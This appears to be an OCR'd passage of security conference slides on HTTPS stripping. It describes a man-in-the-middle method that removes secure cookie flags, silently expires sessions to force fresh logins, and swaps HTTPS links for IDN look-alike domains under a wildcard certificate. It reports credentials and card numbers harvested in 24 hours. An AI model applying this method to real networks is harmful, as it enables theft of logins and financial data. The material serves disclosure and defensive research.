out their links. 

A Simple Solution 

Strip all that stuff too. 

Kill the secure bit on Set-Cookie statements, strip 
the content encodings we don't like from client 
requests, and strip if-modified-since headers too. 



Another problem: sessions 



The most interesting stuff to log are POSTs that 
would have been sent via SSL. 

Particularly, usernames/passwords. 

Sessions often cause us to miss the login step, 
which is unfortunate. 

Sure, we can get the session cookie, but that's 
small change. 



So let's strip sessions too. 




302 for the same URL, 
but with Set-Cookie: 
headers that expire all 
the cookies we got 
from the request. 

Request Again 
(Sans-Cookies) 




And a little less sketchy... 

Sessions expire, and it's not always clear when or why, 
but they don't usually expire right in the middle of an 
active session. So what we do now: 

When we start a MITM against a network, strip all 
the traffic immediately, but don't touch the 
cookies for 5 min (or some specified length of 
time). 

As the cookies go by, make note of the active 
sessions. 

After the time is up, start killing sessions, but only 
new sessions that we haven't seen before. These 
should be the "long running" sessions that won't 
be seen as suspicious should they disappear. 



Some Results Of This Trick? 

login.yahoo.com 114 
Gmail 50 
ticketmaster.com 42 
rapidshare.com 14 
Hotmail 13 
paypal.com 9 
linkedin.com 9 
facebook.com 3 



In 24 Hours 



117 email accounts. 
16 credit card numbers. 
7 paypal logins. 

Over 300 other miscellaneous secure logins. 



Number of people that balked. 

o 



Where can we go from here? 



Combining this technique with homograph 

attacks. 



Standard homograph attack: 

Sometimes the glphys of different characters look 
alike. PayPal.com looks like paypal.com but is 
really paypai.com 

Made more interesting by IDN. It became possible 
to register a domain with characters that appear 
identical to the glyphs of characters in the Latin 
character set. 

In 2005, Ericjohanson registered 
pаypal.com, which uses the Cryllic 'a' look- 
alike character and displays as paypal.com 



Combining this technique with homograph 

attacks. 



What I don't like about the standard attack: 

The attack vector has to be targeted. By 
registering pаypal.com, all we can attack 
is paypal.com 

Phishing is really just too much work. It'd be nicer 
if we could just MITM a network and get whatever 
people are doing. 

The IDN stuff has been fixed. ForTLDs like .com, 
Firefox renders the IDN characters as punycode 
both in the URL bar and the status bar. 



pаypal.com today 
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This website is hosted by 3ric Johanson. More information can be found Here . 
Also, if you happen to work for paypal, please get in touch with me. I'd like to give 
you your trademarked domain name back., please... 



Done 



So how can we reinvent this to attack 

SSL? 

We can't use .com or any TLD that Firefox will 
render into punycode. 

We want something that we can generalize, not 
just a simple substitution for some particular 
character in a domain. 

So, what's in most URLs? . / & ? 



one trick 



Register a domain like ijjk.cn 

Get a domain-validated SSL wildcard cert for 
*. ijjk.cn 

Use IDN-valid characters that look very similar to 
V and '?' to create false URLs. 

MITM HTTP and swap out the HTTPS links as usual. 

But this time, instead of just stripping the HTTPS 
links, we swap them out for our own look-alikes. 



one trick 



becomes 

The latter does not display as punycode in the 
status bar or the URL bar. 

When resolved, it becomes www.google.xn-- 
comaccountsservicelogin-5j9pia.f. ijjk.cn 

When we MITM these connections, we do SSL on 
both ends, but are able to present our own valid 
*. ijjk.cn cert to the client. 



Here We Go 




Request 



302 for the same URL, 
but with Set-Cookie: 
headers that expire all 
the cookies we got 
from the request. 



Request Again 
(Sans-Cookies) 

< 

Proxy HTTP back, and 
swap out all the HTTPS 
links for our own look- 
alike HTTPS links. 



SSL request for a look- 
alike domain that we 
control. 



* — i 




X 



Proxy data back from 
the actual domain. 



An Example 
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HOME SECURITY ASSURANCE LOCATE PNC CONTACT US CUSTOMER SERVI 



|Search 



PERSONAL 



SMALL BUSINESS 



CORPORATE & INSTITUTIONAL 



ABOUT PNC 



User ID 




Sign On to Oilier Services: 

Select Service 



► PNC Security Assurance 



PNC Bank Select Reward 

Visa 9 Platinum Car 

Take advantage of a 0.99 
Introductory APR throug 
March 31, 2010 o 
Balance Transfer* 
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FDIC 



Important FDIC Information 

PNC Bank is participating in the 
FDICs Transaction Account 
Guarantee Program, more ► 



roducts and Services 



PNC's wide range of services can make 
banking easier, and more convenient 
than ever. See why PNC's the smart 
choice for help in meeting your financial 
goals. 



I t ^Mk^ Two of America's 
best-known banks. 
S%£ x ^ Now simply one of 
America's best 

Making the transition to PNC as 
easy as possible for vou. 



► Online Banking and Bill Pay 

► Checking 

► Savings 

► Loans and Lines of Credit 

► Cards 



Whatever challenges and opportunities 
lie ahead, PNC can help. See why 
working with PNC to plan for life's 
greatest milestones is the smart 
choice. 

► Making the Most of Your Money 

► Virtual Wallet 

► Planning for Retirement 

► Saving for Education 

► Buying a Home 
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Done 



An Example 
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PNC's wide range of services can make 
banking easier, and more convenient 
than ever. See why PNC's the smart 
choice for help in meeting yourfinancial 
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best-known banks. 
I ' ™ Now simply one of 



America's best 

Making the transition to PNC as 
easy as possible for vou. 



► Online Banking and Bill Pay 

► Checking 

► Savings 

► Loans and Lines of Credit 

► Cards 



Whatever challenges and opportunities 
lie ahead, PNC can help. See why 
working with PMC to plan for life's 
greatest milestones is the smart 
choice. 

► Making the Most of Your Money 

► Virtual Wallet 

► Planning for Petirement 

► Saving for Education 

► Buying a Home 
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Done 



Nice thing about this 



Happens in real-time. 

Generalized: 

Targets whatever secure sites people are 
browsing to at any moment. 

Doesn't require multiple certificates or 
restricting ourselves to popular sites. 

Once we get a secure POST, we can switch them 
back to a normal traffic stream. 



Lessons 



Lots of times the security of HTTPS comes down 
to the security of HTTP, and HTTP is not secure. 

If we want to avoid the dialogs of death, start 
with HTTP not HTTPS. 

Once we've got control of that, we can do all 
kinds of stuff to re-introduce the positive 
indicators people might miss. 



Other tricks... 



sslstrip 

http://www.thoughtcrime.org 



